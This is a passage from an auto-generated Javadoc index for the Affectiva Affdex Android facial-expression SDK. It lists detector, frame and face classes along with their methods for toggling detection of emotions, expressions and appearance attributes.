<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html#getValue()">getValue()</a></span> - Method in enum com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html" title="enum in com.affectiva.android.affdex.sdk.detector">Face.EMOJI</a></dt>
<dd>
<div class="block">Returns the "value" of this emoji, i.e., the unicode character value.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html#getWidth()">getWidth()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.BitmapFrame</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html#getWidth()">getWidth()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.ByteArrayFrame</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#getWidth()">getWidth()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Get <code>Frame</code>'s width.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html#getWink()">getWink()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emojis</a></dt>
<dd>
<div class="block">Returns the score for 😉 (winking face).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html#getYaw()">getYaw()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Measurements.Orientation</a></dt>
<dd>
<div class="block">Gets the Yaw score, measured in degrees.</div>
</dd>
</dl>
<a name="_I_">
<!-- -->
</a>
<h2 class="title">I</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#isRunning()">isRunning()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Returns the state of the detector.</div>
</dd>
</dl>
<a name="_L_">
<!-- -->
</a>
<h2 class="title">L</h2>
<dl>
<dt><a href="./com/affectiva/android/affdex/sdk/LicenseException.html" title="class in com.affectiva.android.affdex.sdk"><span class="strong">LicenseException</span></a> - Exception in <a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/LicenseException.html#LicenseException(java.lang.String)">LicenseException(String)</a></span> - Constructor for exception com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/LicenseException.html" title="class in com.affectiva.android.affdex.sdk">LicenseException</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/LicenseException.html#LicenseException(java.lang.String, java.lang.Throwable)">LicenseException(String, Throwable)</a></span> - Constructor for exception com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/LicenseException.html" title="class in com.affectiva.android.affdex.sdk">LicenseException</a></dt>
<dd> </dd>
</dl>
<a name="_M_">
<!-- -->
</a>
<h2 class="title">M</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#measurements">measurements</a></span> - Variable in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
</dl>
<a name="_O_">
<!-- -->
</a>
<h2 class="title">O</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraEventListener.html#onCameraSizeSelected(int, int, com.affectiva.android.affdex.sdk.Frame.ROTATE)">onCameraSizeSelected(int, int, Frame.ROTATE)</a></span> - Method in interface com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraEventListener.html" title="interface in com.affectiva.android.affdex.sdk.detector">CameraDetector.CameraEventListener</a></dt>
<dd>
<div class="block">Called when the size and orientation of the camera preview frames are known.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceListener.html#onFaceDetectionStarted()">onFaceDetectionStarted()</a></span> - Method in interface com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceListener.html" title="interface in com.affectiva.android.affdex.sdk.detector">Detector.FaceListener</a></dt>
<dd>
<div class="block">Indicates that the face detector has started tracking a face.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceListener.html#onFaceDetectionStopped()">onFaceDetectionStopped()</a></span> - Method in interface com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceListener.html" title="interface in com.affectiva.android.affdex.sdk.detector">Detector.FaceListener</a></dt>
<dd>
<div class="block">Indicates that the face detector has stopped tracking a face.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#onFrameAvailable(byte[], int, int, com.affectiva.android.affdex.sdk.Frame.ROTATE)">onFrameAvailable(byte[], int, int, Frame.ROTATE)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#onFrameSizeSelected(int, int, com.affectiva.android.affdex.sdk.Frame.ROTATE)">onFrameSizeSelected(int, int, Frame.ROTATE)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.ImageListener.html#onImageResults(java.util.List, com.affectiva.android.affdex.sdk.Frame, float)">onImageResults(List<Face>, Frame, float)</a></span> - Method in interface com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.ImageListener.html" title="interface in com.affectiva.android.affdex.sdk.detector">Detector.ImageListener</a></dt>
<dd>
<div class="block">Delivers information about an image which has been handled by the Detector</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html#onProcessingFinished()">onProcessingFinished()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">VideoFileDetector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.html#orientation">orientation</a></span> - Variable in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Measurements</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#originalBitmap">originalBitmap</a></span> - Variable in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd> </dd>
</dl>
<a name="_P_">
<!-- -->
</a>
<h2 class="title">P</h2>
<dl>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">PhotoDetector</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A Detector for processing discrete photos.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html#PhotoDetector(Context, int, com.affectiva.android.affdex.sdk.detector.Detector.FaceDetectorMode)">PhotoDetector(Context, int, Detector.FaceDetectorMode)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">PhotoDetector</a></dt>
<dd>
<div class="block">Creates a PhotoDetector</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html#PhotoDetector(Context)">PhotoDetector(Context)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">PhotoDetector</a></dt>
<dd>
<div class="block">Creates a PhotoDetector</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#process(com.affectiva.android.affdex.sdk.Frame, float)">process(Frame, float)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">FrameDetector</a></dt>
<dd>
<div class="block">Asks the Detector to process the passed facePicture.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html#process(com.affectiva.android.affdex.sdk.Frame)">process(Frame)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/PhotoDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">PhotoDetector</a></dt>
<dd>
<div class="block">Processes a photo.</div>
</dd>
</dl>
<a name="_Q_">
<!-- -->
</a>
<h2 class="title">Q</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#qualities">qualities</a></span> - Variable in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
</dl>
<a name="_R_">
<!-- -->
</a>
<h2 class="title">R</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#reset()">reset()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#reset()">reset()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Resets the baselines used to measure facial expressions and emotions.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#reset()">reset()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">FrameDetector</a></dt>
<dd>
<div class="block">Resets the baselines used to detect expressions and emotions.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html#reset()">reset()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">VideoFileDetector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#revertPointRotation(PointF[])">revertPointRotation(PointF[])</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Revert points to the <code>Frame</code>'s original coordinate space.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#revertPointRotation(PointF[], int, int, com.affectiva.android.affdex.sdk.Frame.ROTATE)">revertPointRotation(PointF[], int, int, Frame.ROTATE)</a></span> - Static method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Revert points to <code>Frame</code>'s original coordinate space</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#rotateImage(Bitmap, float)">rotateImage(Bitmap, float)</a></span> - Static method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Rotate a <code>Bitmap</code>.</div>
</dd>
</dl>
<a name="_S_">
<!-- -->
</a>
<h2 class="title">S</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html#setBitmap(Bitmap, com.affectiva.android.affdex.sdk.Frame.COLOR_FORMAT)">setBitmap(Bitmap, Frame.COLOR_FORMAT)</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.BitmapFrame</a></dt>
<dd>
<div class="block">Set underlying <code>Bitmap</code> object.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#setCameraType(com.affectiva.android.affdex.sdk.detector.CameraDetector.CameraType)">setCameraType(CameraDetector.CameraType)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd>
<div class="block">Indicates which device camera to use.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAge(boolean)">setDetectAge(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAllAppearance(boolean)">setDetectAllAppearance(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block"><span class="strong">Deprecated.</span>
<div class="block"><i>as of version 3.1 in favor of the equivalent -- but more appropriately named -- <a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAllAppearances(boolean)"><code>Detector.setDetectAllAppearances(boolean)</code></a></i></div>
</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAllAppearances(boolean)">setDetectAllAppearances(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Activates/Deactivates detection of all appearance attributes simultaneously.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAllEmojis(boolean)">setDetectAllEmojis(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Activates/Deactivates detection of emojis.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAllEmotions(boolean)">setDetectAllEmotions(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Activates/Deactivates detection of all emotions simultaneously.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAllExpressions(boolean)">setDetectAllExpressions(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Activates/Deactivates detection of all expressions simultaneously.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAnger(boolean)">setDetectAnger(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectAttention(boolean)">setDetectAttention(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectBrowFurrow(boolean)">setDetectBrowFurrow(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectBrowRaise(boolean)">setDetectBrowRaise(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectCheekRaise(boolean)">setDetectCheekRaise(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectChinRaise(boolean)">setDetectChinRaise(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectContempt(boolean)">setDetectContempt(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectDimpler(boolean)">setDetectDimpler(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectDisgust(boolean)">setDetectDisgust(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectEngagement(boolean)">setDetectEngagement(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectEthnicity(boolean)">setDetectEthnicity(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectEyeClosure(boolean)">setDetectEyeClosure(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectEyeWiden(boolean)">setDetectEyeWiden(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectFear(boolean)">setDetectFear(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectGender(boolean)">setDetectGender(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectGlasses(boolean)">setDetectGlasses(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectInnerBrowRaise(boolean)">setDetectInnerBrowRaise(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectJawDrop(boolean)">setDetectJawDrop(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectJoy(boolean)">setDetectJoy(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectLidTighten(boolean)">setDetectLidTighten(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectLipCornerDepressor(boolean)">setDetectLipCornerDepressor(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectLipPress(boolean)">setDetectLipPress(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectLipPucker(boolean)">setDetectLipPucker(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectLipStretch(boolean)">setDetectLipStretch(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectLipSuck(boolean)">setDetectLipSuck(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectMouthOpen(boolean)">setDetectMouthOpen(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectNoseWrinkle(boolean)">setDetectNoseWrinkle(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectSadness(boolean)">setDetectSadness(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectSmile(boolean)">setDetectSmile(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectSmirk(boolean)">setDetectSmirk(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectSurprise(boolean)">setDetectSurprise(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectUpperLipRaise(boolean)">setDetectUpperLipRaise(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setDetectValence(boolean)">setDetectValence(boolean)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setFaceListener(com.affectiva.android.affdex.sdk.detector.Detector.FaceListener)">setFaceListener(Detector.FaceListener)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#setId(int)">setId(int)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setImageListener(com.affectiva.android.affdex.sdk.detector.Detector.ImageListener)">setImageListener(Detector.ImageListener)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#setLicensePath(java.lang.String)">setLicensePath(String)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block"><span class="strong">Deprecated.</span>
